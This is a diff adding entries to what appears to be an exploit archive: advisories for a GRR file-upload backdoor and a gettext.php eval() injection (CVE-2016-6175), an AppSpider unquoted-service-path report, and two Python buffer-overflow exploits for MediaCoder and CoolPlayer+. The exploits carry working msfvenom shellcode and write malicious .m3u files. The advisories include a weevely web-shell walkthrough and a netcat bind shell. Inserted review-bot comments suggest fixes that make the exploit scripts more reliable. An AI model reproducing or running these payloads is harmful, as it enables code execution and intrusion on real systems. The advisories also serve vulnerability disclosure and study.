Veuillez signaler ce problème à l\'administrateur du serveur.\\n"; + $ok = 'no'; + } + else + { + $tab = explode(".", $doc_file['name']); + $ext = strtolower($tab[1]); + if ($dest.$doc_file['name']!=$dest."logo.".$ext) + { + if (@file_exists($dest."logo.".$ext)) + @unlink($dest."logo.".$ext); + rename($dest.$doc_file['name'],$dest."logo.".$ext); // Vulnerability: if filename is "backdoor.php.jpg" we rename it as "logo.php" !! + + } + @chmod($dest."logo.".$ext, 0666); // Vulnerability: why chmod 0666 on this f****** file!?!? + + $picture_room = "logo.".$ext; + if (!Settings::set("logo", $picture_room)) + { + $msg .= "Erreur lors de l'enregistrement du logo !\\n"; + $ok = 'no'; + } + } + } +} +snip... + +IV. PROOF OF CONCEPT +====================================================================================== + +Generate backdoor: + + kmkz@Tapz:~# weevely generate pass123 /tmp/3lrvs.php + Generated backdoor with password 'pass123' in '/tmp/3lrvs.php' of 1486 byte size. + kmkz@Tapz:~# mv /tmp/3lrvs.php /tmp/3lrvs.php.jpg + + +Login as admin and upload this new 'logo' > Administration > logo + +Enjoy your shell! + + kmkz@Tapz:~# weevely http://server/images/logo.php pass123 + [+] weevely 3.2.0 + + [+] Target: server:F:\server\grr\images + [+] Session: /kmkz/.weevely/sessions/laboratoire.target.fr/logo_1.session + [+] Shell: System shell + + [+] Browse the filesystem or execute commands starts the connection + [+] to the target. Type :help for more information. + + weevely> whoami + autorite nt\system + + + +V. RISK +====================================================================================== +By uploading a script, an attacker may be able to execute arbitrary code +on the server with elevated privileges. + +This flaw may compromise the integrity of the system +(with access to sensitive informations, network shares...) and it may conduce +to full information system's compromise using pivots techniques and imagination! + + +VI. 
VERSIONS AFFECTED +====================================================================================== +GRR 3.0.0-RC1 is vulnerable (and all previous versions) + + +VII. TIMELINE +====================================================================================== +December 17th, 2015: Vulnerability identification +January 7th, 2016: Vendor and project developers notification +January 11th, 2016: Project developers response +January 15th, 2016: Patch release +January 17th, 2016: Public disclosure + + +VII. LEGAL NOTICES +====================================================================================== +The information contained within this advisory is supplied "as-is" with +no warranties or guarantees of fitness of use or otherwise. +I accept no responsibility for any damage caused by the use or misuse of this advisory. \ No newline at end of file diff --git a/platforms/php/webapps/40154.txt b/platforms/php/webapps/40154.txt new file mode 100755 index 000000000..b9b9c5d13 --- /dev/null +++ b/platforms/php/webapps/40154.txt 
@@ -0,0 +1,247 @@ +[CVE-2016-6175] gettext.php <= 1.0.12 unauthenticated code execution with POTENTIAL privileges escalation + +# Date: June 25th, 2016 +# Author: kmkz (Bourbon Jean-marie) | @kmkz_security +# Project Homepage: https://launchpad.net/php-gettext/ +# Download: https://launchpad.net/php-gettext/trunk/1.0.12/+download/php-gettext-1.0.12.tar.gz +# Version: 1.0.12 (latest release) +# Tested on: Linux Debian, PHP 5.6.19-2+b1 + +# CVSS: 7.1 +# OVE ID: OVE-20160705-0004 +# CVE ID: CVE-2016-6175 +# OSVDB ID: n/a + +# Thanks: +Lars Michelsen from NagVis project where this bug was discovered and +Danilo Segan from gettext.php team project for their reactivity and professionalism + +# Credits: +https://bugs.launchpad.net/php-gettext/+bug/1606184 +https://github.com/NagVis/nagvis/commit/4fe8672a5aec3467da72b5852ca6d283c15adb53 + +# Fixes: +https://github.com/NagVis/nagvis/blob/4fe8672a5aec3467da72b5852ca6d283c15adb53/share/server/core/ext/php-gettext-1.0.12/gettext.php +https://bugs.launchpad.net/php-gettext/+bug/1606184 + +gettext.php <= 1.0.12 (latest) local/remote code execution with POTENTIAL privileges escalation issue + + +I. APPLICATION + +This library provides PHP functions to read MO files even when gettext is not compiled in or when appropriate locale is not present on the system. +This issue was discovered by auditing Nagvis project source code, however NagVis is not impacted by the following issue. + +NagVis is a visualization addon for the well known network managment system Nagios. +NagVis can be used to visualize Nagios Data, e.g. to display IT processes like a mail system or a network infrastructure. + + +II. ADVISORY + +A possible remote (or local) code execution were identified in the gettext.php file allowing an attacker to gain access on the nagvis host system and/or gain application's privileges throught a specially crafted .mo language file. 
+The $string variable is not sufficiently sanitized before to be submitted to eval() function (which is dangerous) in select_string() function causing the security issue. + + +III. VULNERABILITY DESCRIPTION + +The gettext_reader() funtion try to test magic number that need to match with .mo files : + +$MAGIC1 = "\x95\x04\x12\xde"; +$MAGIC2 = "\xde\x12\x04\x95"; + +If it seems correct then we'll continue. +We then extract forms from .mo file's header through get_plural_forms() function and check them with a deprecated (since php 5.3.0 because it can be easily bypassed by adding a Null Byte) eregi() regexp function in order to valid they match the following pattern: + +plural-forms: ([^\n]*)\n + +(This regular expression matching have no effect on our payload) + +Next step will be to sanitize the obtained expression string before to practice the fatal eval() on this one. + + +Here is the impacted code snippet : + +snip... +if (eregi("plural-forms: ([^\n]*)\n", $header, $regs)) +$expr = $regs[1]; +else + +$expr = "nplurals=2; plural=n == 1 ? 0 : 1;"; + +$this->pluralheader = $this->sanitize_plural_expression($expr); // The vulnerable function!! +} +snip... + + +The comments presents at the beginning of sanitize_plural_expression() function explain that this one is here to prevent the eval() function attacks called later. + + + +Comments are : + +/** Sanitize plural form expression for use in PHP eval call. +@access private +@return string sanitized plural form expression**/ + +In fact, the security is guaranteed by a "preg_replace" that not permit us to inject specials chars. + +snip... +function sanitize_plural_expression($expr) { + +// Get rid of disallowed characters. +$expr = preg_replace('@[^a-zA-Z0-9_:;\(\)\?\|\&=!<>+*/\%-]@', '', $expr); // « sanitizer » +// Add parenthesis for tertiary '?' operator. + +$expr .= ';'; +$res = ''; +$p = 0; + +for ($i = 0; $i < strlen($expr); $i++) { // indentation ? +$ch = $expr[$i]; + +switch ($ch) { + +case '?': +$res .= ' ? 
('; +$p++; + +break; + +case ':': +$res .= ') : ('; + +break; + +case ';': +$res .= str_repeat( ')', $p) . ';'; +$p = 0; + +break; + +default: + +$res .= $ch; + +} +} +return $res; +} +snip... + + +Code snippet from the vulnerable function that execute eval() on the « sanitized string : + + +snip... +$string = $this->get_plural_forms(); +$string = str_replace('nplurals',"\$total",$string); +$string = str_replace("n",$n,$string); +$string = str_replace('plural',"\$plural",$string); + +$total = 0; +$plural = 0; + +eval("$string"); // eval called .... launch my shell baby ! +snip... + + +However, for example (but not only!) we can call system() function with « sh » parameter in order to launch a /bin/sh command on the targeted system and allowing us to gain an interactive shell with application privileges on it. +A real scenario could be that a real attacker overwrites languages files located in the /nagvis-1.8.5/share/frontend/nagvis-js/locale/ directory, in an internal repository, a Docker shared folder or any other folder. +He now just have to wait or to execute the payload himself to obtain his shell, that's why this vulnerability is not so harmless ! + +Note : +Apart from that we could imagine that the attacker transform the $expr variable to obtain an interactive remote shell without eval() and with (maybe) more privileges like this : + +$expr= (`nc -l -p 1337 -e /bin/sh`); // proof of concept and screenshots joined to this advisory + +Like a Perl developer could say: + +« there is more than one way to do it » + + +IV. PROOF OF CONCEPT + +Following PHP code reproduce the exploitation concept base on the 1.0.9 version +(without a crafted .mo file and joined with this advisory). + + ++*/\%-]@', '', $expr);// vuln +$expr = preg_replace('@[^a-zA-Z0-9_:;\(\)\?\|\&=!<>+*/\%-]@', '', $expr);/ + +$expr .= ';'; + + // Add parenthesis for tertiary '?' operator. 
+$expr .= ';'; +$res = ''; +$p = 0; +for ($i = 0; $i < strlen($expr); $i++) { + $ch = $expr[$i]; + switch ($ch) { + case '?': + $res .= ' ? ('; + $p++; + break; + case ':': + $res .= ') : ('; + break; + case ';': + $res .= str_repeat( ')', $p) . ';'; + $p = 0; + break; + default: + $res .= $ch; + } +} + +// Vulnerable function : +$n= (1); +$total=("1000"); + + if (!is_int($n)) { + throw new InvalidArgumentException( + "Select_string only accepts integers: " . $n); // test sur la version 2 de gettext.php +} + +$string = str_replace('nplurals',"\$total",$res); +$string = str_replace("n",$res,$res); +$string = str_replace('plural',"\$plural",$res); +eval("$string"); +?> + + +V. RECOMMENDATIONS + +As explained in the associated « bug track », it was assumed that PO and MO files would come from untrusted translators. +Check the permissions on PO/MO files in order to ensure the provenance and the fact that is only accessible from trusted parties. +The project's members are writing a new version that will patch this issue definitively, thank you to respect their work and to apply this temporary fix. + + + +VI. VERSIONS AFFECTED + +This issue affect the latest GETTEXT .PHP version and were found in latest stable NAGVIS (1.8.5) version. +It could affect the a lot of web application and/or many website as long as it will not be updated. + + +VII. TIMELINE + +June 21th, 2016: Vulnerability identification +June 21th, 2016: Nagvis project developers and gettext.php developers notification +June 22th, 2016: Nagvis project developers response +June 25th, 2016: Nagvis Patch release (even if not really affected) +June 27th, 2016: Gettext.php team response (from Danilo ?egan), exchange started +July 5th, 2016: CVE request ID (mitre) and OVE ID request +July 7th, 2016: CVE-2016-6175 attributed by MITRE +July 25th, 2016: Public disclosure + + +VIII. 
LEGAL NOTICES + +The information contained within this advisory is supplied "as-is" with +no warranties or guarantees of fitness of use or otherwise. +I accept no responsibility for any damage caused by the use or misuse of this advisory. diff --git a/platforms/windows/local/40145.txt b/platforms/windows/local/40145.txt new file mode 100755 index 000000000..4b94910e0 --- /dev/null +++ b/platforms/windows/local/40145.txt 
@@ -0,0 +1,90 @@
+
+Rapid7 AppSpider 6.12 Web Application Vulnerability Scanner Elevation Of Privilege
+
+
+Vendor: Rapid7, Inc.
+Product web page: https://www.rapid7.com
+Affected version: 6.12.10.1
+
+Summary: While today's malicious attackers pursue a variety of
+goals, they share a preferred channel of attack - the millions
+of custom web, mobile, and cloud applications companies deploy
+to serve their customers. AppSpider dynamically scans these
+applications for vulnerabilities across all modern technologies,
+provides tools that speed remediation, and monitors applications
+for changes.
+
+Desc: The application suffers from an unquoted search path issue
+impacting the services 'AppSpider REST Server', 'AppSpider REST Service'
+and 'AppSpiderUpgradeService' for Windows deployed as part of AppSpider
+solution. This could potentially allow an authorized but non-privileged
+local user to execute arbitrary code with elevated privileges on the
+system. A successful attempt would require the local user to be able to
+insert their code in the system root path undetected by the OS or other
+security applications where it could potentially be executed during
+application startup or reboot. If successful, the local user’s code
+would execute with the elevated privileges of the application.
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN)
+ Microsoft Windows 7 Ultimate SP1 (EN)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2016-5344
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5344.php
+
+Vendor: https://community.rapid7.com/docs/DOC-3455
+
+
+05.07.2016
+
+--
+
+
+C:\>sc qc "AppSpider REST Server"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: AppSpider REST Server
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files (x86)\Rapid7\AppSpider6\restserviceworker\WebWindowsService.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : AppSpider REST Server
+ DEPENDENCIES :
+ SERVICE_START_NAME : NT AUTHORITY\NetworkService
+
+
+C:\>sc qc "AppSpider REST Service"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: AppSpider REST Service
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files (x86)\Rapid7\AppSpider6\RestService\WebService.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : AppSpider REST Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+
+C:\>sc qc AppSpiderUpgradeService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: AppSpiderUpgradeService
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 3 DEMAND_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files (x86)\Rapid7\AppSpider6\AppSpiderUpgradeService\AppSpiderUpgradeService.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : AppSpiderUpgradeService
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
diff --git a/platforms/windows/local/40148.py b/platforms/windows/local/40148.py
new file mode 100755
index 000000000..7a0e125bf
--- /dev/null
+++ b/platforms/windows/local/40148.py
@@ -0,0 +1,58 @@
+# Exploit Title: [MediaCoder 0.8.43.5852 - .m3u SEH Exploit]
+# Exploit Author: [Karn Ganeshen]
+# Vendor Homepage: [http://www.mediacoderhq.com]
+# Download link: [http://www.mediacoderhq.com/mirrors.html?file=MediaCoder-0.8.45.5852.exe]
+# Version: [Current version 0.8.43.58.52]
+# Tested on: [Windows Vista SP2]
+#
+
+#!/usr/bin/python
+
+total_buf = 5000
+
+# msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/alpha_upper -b '\x00\x0a\x0d\xff' -f c
+# Payload size: 455 bytes
+
+shellcode = ("\x89\xe1\xda\xcc\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
+"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
+"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
+"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
+"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d\x38\x4c\x42\x55\x50"
+"\x45\x50\x35\x50\x53\x50\x4c\x49\x4b\x55\x46\x51\x59\x50\x55"
+"\x34\x4c\x4b\x30\x50\x56\x50\x4c\x4b\x31\x42\x54\x4c\x4c\x4b"
+"\x46\x32\x44\x54\x4c\x4b\x32\x52\x47\x58\x34\x4f\x58\x37\x50"
+"\x4a\x47\x56\x50\x31\x4b\x4f\x4e\x4c\x37\x4c\x43\x51\x53\x4c"
+"\x53\x32\x36\x4c\x51\x30\x59\x51\x58\x4f\x34\x4d\x35\x51\x48"
+"\x47\x4a\x42\x5a\x52\x36\x32\x46\x37\x4c\x4b\x56\x32\x52\x30"
+"\x4c\x4b\x50\x4a\x57\x4c\x4c\x4b\x50\x4c\x52\x31\x32\x58\x4d"
+"\x33\x30\x48\x33\x31\x38\x51\x46\x31\x4c\x4b\x50\x59\x31\x30"
+"\x33\x31\x49\x43\x4c\x4b\x30\x49\x55\x48\x5a\x43\x36\x5a\x47"
+"\x39\x4c\x4b\x30\x34\x4c\x4b\x45\x51\x39\x46\x36\x51\x4b\x4f"
+"\x4e\x4c\x59\x51\x48\x4f\x44\x4d\x53\x31\x58\x47\x56\x58\x4d"
+"\x30\x33\x45\x4b\x46\x54\x43\x43\x4d\x4c\x38\x47\x4b\x53\x4d"
+"\x37\x54\x54\x35\x5a\x44\x51\x48\x4c\x4b\x30\x58\x57\x54\x35"
+"\x51\x4e\x33\x55\x36\x4c\x4b\x54\x4c\x30\x4b\x4c\x4b\x56\x38"
+"\x45\x4c\x43\x31\x58\x53\x4c\x4b\x55\x54\x4c\x4b\x35\x51\x48"
+"\x50\x4b\x39\x51\x54\x56\x44\x46\x44\x51\x4b\x31\x4b\x43\x51"
+"\x46\x39\x30\x5a\x46\x31\x4b\x4f\x4d\x30\x51\x4f\x51\x4f\x31"
+"\x4a\x4c\x4b\x52\x32\x4a\x4b\x4c\x4d\x51\x4d\x52\x4a\x43\x31"
+"\x4c\x4d\x4c\x45\x4f\x42\x43\x30\x55\x50\x33\x30\x30\x50\x33"
+"\x58\x56\x51\x4c\x4b\x32\x4f\x4d\x57\x4b\x4f\x48\x55\x4f\x4b"
+"\x4a\x50\x38\x35\x4e\x42\x31\x46\x53\x58\x49\x36\x5a\x35\x4f"
+"\x4d\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x43\x36\x33\x4c\x35\x5a"
+"\x4b\x30\x4b\x4b\x4d\x30\x44\x35\x33\x35\x4f\x4b\x31\x57\x44"
+"\x53\x52\x52\x52\x4f\x33\x5a\x33\x30\x36\x33\x4b\x4f\x58\x55"
+"\x42\x43\x45\x31\x52\x4c\x35\x33\x56\x4e\x55\x35\x54\x38\x32"
+"\x45\x53\x30\x41\x41")
+
+junk = "http:// "
+junk += "A"*784
+nseh = "\xEB\x06\x90\x90"
+seh = "\x38\x78\x01\x66" # PPR - 0x66017838 - libiconv-2.dll
+evil = junk + nseh + seh
+evil += "\x90"*50 + shellcode
+evil += "\x90"*3000
+
+file = open("evil.m3u", "wb")
+file.write (evil)
+file.close()
diff --git a/platforms/windows/local/40151.py b/platforms/windows/local/40151.py
new file mode 100755
index 000000000..189b61c9a
--- /dev/null
+++ b/platforms/windows/local/40151.py
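Review bot: The `#!/usr/bin/python` line sits at line 9, after the comment header, so it is an ordinary comment rather than an interpreter directive and the file is not directly executable despite its 100755 mode; move it to the first line or drop it. The output handle is bound to `file`, shadowing the builtin, and is closed by hand; `with open("evil.m3u", "wb") as fh:` followed by `    fh.write(evil)` covers both points and also closes the file if the write raises. `total_buf = 5000` is assigned but never read anywhere in the file. The same three points apply to the 40151.py hunk that follows.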
@@ -0,0 +1,53 @@
+# Exploit Title: [CoolPlayer+ Portable build 2.19.6 - .m3u Stack Overflow [Egghunter+ASLR bypass]]
+# Exploit Author: [Karn Ganeshen]
+# Download link: [https://sourceforge.net/projects/portableapps/files/CoolPlayer%2B%20Portable/CoolPlayerPlusPortable_2.19.6.paf.exe/download?use_mirror=liquidtelecom]
+# Version: [Current version 2.19.6]
+# Tested on: [Windows Vista Ultimate SP2]
+#
+# Couple of bof exploits for older versions already on EDB:
+# https://www.exploit-db.com/search/?action=search&description=coolplayer
+
+#!/usr/bin/python
+
+total_buf = 2000
+
+filename="evil.m3u"
+
+# msfvenom -p windows/exec cmd=calc.exe -b \x00\x0a\x0c\0d EXITFUN=thread -f c
+# Payload size: 220 bytes
+
+shellcode = ("\xdb\xdc\xd9\x74\x24\xf4\x58\xbb\x9a\xc7\xdb\xe9\x31\xc9\xb1"
+"\x31\x31\x58\x18\x83\xe8\xfc\x03\x58\x8e\x25\x2e\x15\x46\x2b"
+"\xd1\xe6\x96\x4c\x5b\x03\xa7\x4c\x3f\x47\x97\x7c\x4b\x05\x1b"
+"\xf6\x19\xbe\xa8\x7a\xb6\xb1\x19\x30\xe0\xfc\x9a\x69\xd0\x9f"
+"\x18\x70\x05\x40\x21\xbb\x58\x81\x66\xa6\x91\xd3\x3f\xac\x04"
+"\xc4\x34\xf8\x94\x6f\x06\xec\x9c\x8c\xde\x0f\x8c\x02\x55\x56"
+"\x0e\xa4\xba\xe2\x07\xbe\xdf\xcf\xde\x35\x2b\xbb\xe0\x9f\x62"
+"\x44\x4e\xde\x4b\xb7\x8e\x26\x6b\x28\xe5\x5e\x88\xd5\xfe\xa4"
+"\xf3\x01\x8a\x3e\x53\xc1\x2c\x9b\x62\x06\xaa\x68\x68\xe3\xb8"
+"\x37\x6c\xf2\x6d\x4c\x88\x7f\x90\x83\x19\x3b\xb7\x07\x42\x9f"
+"\xd6\x1e\x2e\x4e\xe6\x41\x91\x2f\x42\x09\x3f\x3b\xff\x50\x55"
+"\xba\x8d\xee\x1b\xbc\x8d\xf0\x0b\xd5\xbc\x7b\xc4\xa2\x40\xae"
+"\xa1\x5d\x0b\xf3\x83\xf5\xd2\x61\x96\x9b\xe4\x5f\xd4\xa5\x66"
+"\x6a\xa4\x51\x76\x1f\xa1\x1e\x30\xf3\xdb\x0f\xd5\xf3\x48\x2f"
+"\xfc\x97\x0f\xa3\x9c\x79\xaa\x43\x06\x86")
+
+# Egghunter - 32 bytes
+eggh = ("\x66\x81\xca\xff\x0f\x42\x52\x6a"
+"\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
+"\xef\xb8\x54\x30\x30\x57\x8b\xfa"
+"\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
+
+# EIP overwrite appears to depend upon location from where the evil file is loaded from
+# Tested from location - C:\
+# For e.g. offset will be different if file is loaded from C: (260) vs C:\Windows\ (249)
+
+junk = "A"*28
+eip = "\xa1\x99\x42\x00" # 0x004299a1 jmp ebx - coolplayer+.exe [noaslr,norebase,nosafeseh]
+
+evil = junk + eggh + "\x90"*200 + eip + "\x90"*18 + "T00WT00W" + shellcode + "\x90"*1490
+
+file = open(filename , 'w')
+file.write(evil)
+file.close()
+
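Review bot: `open(filename , 'w')` opens the output in text mode, which on Windows rewrites any `\n` byte to `\r\n`, while the sibling 40148.py script in this commit writes its byte string with `"wb"`; the two scripts should agree, and binary mode is the one that leaves the assembled bytes unchanged on disk. Under Python 3 the text-mode `write` of a `str` would also change meaning, so `"wb"` is the safer spelling either way. The stray space before the comma in `open(filename , 'w')` is a minor style nit.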